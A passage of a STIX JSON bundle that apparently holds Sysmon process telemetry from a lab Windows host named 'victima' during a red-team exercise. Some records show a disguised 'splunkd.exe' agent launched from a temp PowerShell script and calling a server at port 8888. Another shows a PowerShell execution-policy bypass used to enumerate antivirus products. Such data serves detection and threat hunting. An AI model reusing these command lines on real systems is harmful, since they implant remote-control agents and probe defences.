| }, | |
| { | |
| "id": "observed-data--f3ebf1ef-f213-4a2f-aaf3-58dac1511e36", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.939Z", | |
| "modified": "2022-07-28T16:05:22.939Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args": [ | |
| "powershell", | |
| "-file", | |
| "C:\\Users\\Alice\\AppData\\Local\\Temp\\cd.ps1" | |
| ], | |
| "parent_args_count": 3, | |
| "parent_entity_id": "{ca21cdf6-4b33-62e1-2a02-000000001400}", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "powershell.exe", | |
| "pid": 2476, | |
| "binary_ref": "4", | |
| "command_line": "powershell -file C:\\Users\\Alice\\AppData\\Local\\Temp\\cd.ps1" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "splunkd.exe", | |
| "pid": 3124, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Users\\Public\\splunkd.exe\" -server http://192.168.56.150:8888 -group red ", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:27:17.833563322Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:27:11.496Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "powershell.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "splunkd.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Users\\Public" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "powershell.exe", | |
| "pid": 2476, | |
| "binary_ref": "4", | |
| "command_line": "powershell -file C:\\Users\\Alice\\AppData\\Local\\Temp\\cd.ps1" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args": [ | |
| "powershell", | |
| "-file", | |
| "C:\\Users\\Alice\\AppData\\Local\\Temp\\cd.ps1" | |
| ], | |
| "parent_args_count": 3, | |
| "parent_entity_id": "{ca21cdf6-4b33-62e1-2a02-000000001400}", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:27:10.091Z", | |
| "last_observed": "2022-07-27T14:27:10.091Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--1cf84f08-6a4a-4923-aa6c-17ea935835f9", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.939Z", | |
| "modified": "2022-07-28T16:05:22.939Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "powershell.exe", | |
| "pid": 2476, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T14:27:17.834993009Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:27:11.496Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b33-62e1-2a02-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "powershell.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:27:10.230Z", | |
| "last_observed": "2022-07-27T14:27:10.230Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--1ba8aabb-78d4-4666-87d6-089671e1e518", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.939Z", | |
| "modified": "2022-07-28T16:05:22.939Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "conhost.exe", | |
| "pid": 5592, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T14:27:17.836976320Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:27:11.498Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b33-62e1-2902-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "conhost.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:27:10.275Z", | |
| "last_observed": "2022-07-27T14:27:10.275Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--957ce02b-ec7b-4356-8261-12e8de00bd8d", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.940Z", | |
| "modified": "2022-07-28T16:05:22.940Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "WmiPrvSE.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T19:19:02.347947603Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T19:18:55.966Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-8f26-62e1-4903-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "WmiPrvSE.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32\\wbem" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "NETWORK SERVICE", | |
| "account_login": "NETWORK SERVICE" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T19:18:54.482Z", | |
| "last_observed": "2022-07-27T19:18:54.482Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--ba303dc1-27f0-4eea-b727-18bb89c0290e", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.940Z", | |
| "modified": "2022-07-28T16:05:22.940Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\svchost.exe", | |
| "-k", | |
| "netsvcs", | |
| "-p", | |
| "-s", | |
| "wlidsvc" | |
| ], | |
| "pe_file_version": "10.0.19041.1806 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Host Process for Windows Services", | |
| "pe_original_file_name": "svchost.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-cfe5-62e1-ad03-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "pid": 680 | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "svchost.exe", | |
| "pid": 5380, | |
| "binary_ref": "4", | |
| "command_line": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s wlidsvc", | |
| "creator_user_ref": "11" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "6", | |
| "ingested": "2022-07-27T23:53:17.455554967Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T23:53:11.107Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "11" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "svchost.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "6": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "7", | |
| "8" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "9" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "7": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "8": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "9": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "10": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "11": { | |
| "type": "user-account", | |
| "user_id": "SYSTEM", | |
| "account_login": "SYSTEM" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\svchost.exe", | |
| "-k", | |
| "netsvcs", | |
| "-p", | |
| "-s", | |
| "wlidsvc" | |
| ], | |
| "pe_file_version": "10.0.19041.1806 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Host Process for Windows Services", | |
| "pe_original_file_name": "svchost.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-cfe5-62e1-ad03-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T23:53:09.899Z", | |
| "last_observed": "2022-07-27T23:53:09.899Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--643d0190-2437-4583-92b0-2a3eb7482951", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.940Z", | |
| "modified": "2022-07-28T16:05:22.940Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "svchost.exe", | |
| "pid": 5380, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T23:56:18.217117863Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T23:56:11.877Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-cfe5-62e1-ad03-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "svchost.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "SYSTEM", | |
| "account_login": "SYSTEM" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T23:56:10.320Z", | |
| "last_observed": "2022-07-27T23:56:10.320Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--004ecf0c-31d0-4789-b555-4badf72ee441", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.941Z", | |
| "modified": "2022-07-28T16:05:22.941Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\svchost.exe", | |
| "-k", | |
| "netsvcs", | |
| "-p", | |
| "-s", | |
| "wlidsvc" | |
| ], | |
| "pe_file_version": "10.0.19041.1806 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Host Process for Windows Services", | |
| "pe_original_file_name": "svchost.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-fbf3-62e0-dd00-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "pid": 680 | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "svchost.exe", | |
| "pid": 2476, | |
| "binary_ref": "4", | |
| "command_line": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s wlidsvc", | |
| "creator_user_ref": "11" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "6", | |
| "ingested": "2022-07-27T08:48:59.560251114Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T08:48:53.237Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "11" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "svchost.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "6": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "7", | |
| "8" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "9" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "7": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "8": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "9": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "10": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "11": { | |
| "type": "user-account", | |
| "user_id": "SYSTEM", | |
| "account_login": "SYSTEM" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\svchost.exe", | |
| "-k", | |
| "netsvcs", | |
| "-p", | |
| "-s", | |
| "wlidsvc" | |
| ], | |
| "pe_file_version": "10.0.19041.1806 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Host Process for Windows Services", | |
| "pe_original_file_name": "svchost.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-fbf3-62e0-dd00-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T08:48:51.858Z", | |
| "last_observed": "2022-07-27T08:48:51.858Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--0df6980f-c5c0-487e-ac81-579ad66a26dd", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.941Z", | |
| "modified": "2022-07-28T16:05:22.941Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "svchost.exe", | |
| "pid": 2476, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T08:54:18.482581490Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T08:54:12.166Z", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-fbf3-62e0-dd00-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "svchost.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "SYSTEM", | |
| "account_login": "SYSTEM" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T08:54:10.236Z", | |
| "last_observed": "2022-07-27T08:54:10.236Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--71cdb1d9-3108-4c26-b02d-be95bc729671", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.941Z", | |
| "modified": "2022-07-28T16:05:22.941Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\System32\\Wbem\\WMIC.exe", | |
| "/NAMESPACE:\\\\root\\SecurityCenter2", | |
| "PATH", | |
| "AntiVirusProduct", | |
| "GET", | |
| "/value" | |
| ], | |
| "parent_args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "wmic /NAMESPACE:\\\\root\\SecurityCenter2 PATH AntiVirusProduct GET /value" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4f12-62e1-6002-000000001400}", | |
| "pe_file_version": "10.0.19041.1741 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "WMI Commandline Utility", | |
| "pe_original_file_name": "wmic.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-4f12-62e1-6102-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "powershell.exe", | |
| "pid": 6300, | |
| "binary_ref": "4", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C \"wmic /NAMESPACE:\\\\root\\SecurityCenter2 PATH AntiVirusProduct GET /value\"" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "WMIC.exe", | |
| "pid": 5380, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" /NAMESPACE:\\\\root\\SecurityCenter2 PATH AntiVirusProduct GET /value", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:43:38.272485719Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:43:31.940Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "powershell.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "WMIC.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32\\wbem" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "powershell.exe", | |
| "pid": 6300, | |
| "binary_ref": "4", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C \"wmic /NAMESPACE:\\\\root\\SecurityCenter2 PATH AntiVirusProduct GET /value\"" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\System32\\Wbem\\WMIC.exe", | |
| "/NAMESPACE:\\\\root\\SecurityCenter2", | |
| "PATH", | |
| "AntiVirusProduct", | |
| "GET", | |
| "/value" | |
| ], | |
| "parent_args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "wmic /NAMESPACE:\\\\root\\SecurityCenter2 PATH AntiVirusProduct GET /value" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4f12-62e1-6002-000000001400}", | |
| "pe_file_version": "10.0.19041.1741 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "WMI Commandline Utility", | |
| "pe_original_file_name": "wmic.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 6, | |
